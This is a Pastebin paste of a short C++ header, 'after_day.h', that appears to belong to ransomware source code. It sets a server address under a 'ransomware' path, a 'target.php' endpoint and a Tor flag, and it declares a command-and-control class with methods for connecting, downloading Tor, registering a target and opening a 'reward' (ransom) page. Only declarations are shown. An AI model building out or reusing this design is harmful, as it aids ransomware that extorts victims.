Advertisement
FlyFar

source/after_day.h

Sep 2nd, 2023
861
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 0.37 KB | Cybersecurity | 0 0
  1. #ifndef __AFTER_DAY__
  2. #define __AFTER_DAY__
  3. #endif
  4.  
  5. #include <iostream>
  6. #include <stdlib.h>
  7.  
  8. #define HOST "http://localhost/ransomware/"
  9. #define PATH "target.php"
  10. #define __TOR_USED__ 0
  11.  
  12. class CandC
  13. {
  14.     public:
  15.     int hello(void);
  16.     int download_tor(void);
  17.     int checkifconnected(void);
  18.     int insert_target(void);
  19.     int openReward(void);
  20.     std::string nb_file;
  21. };
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement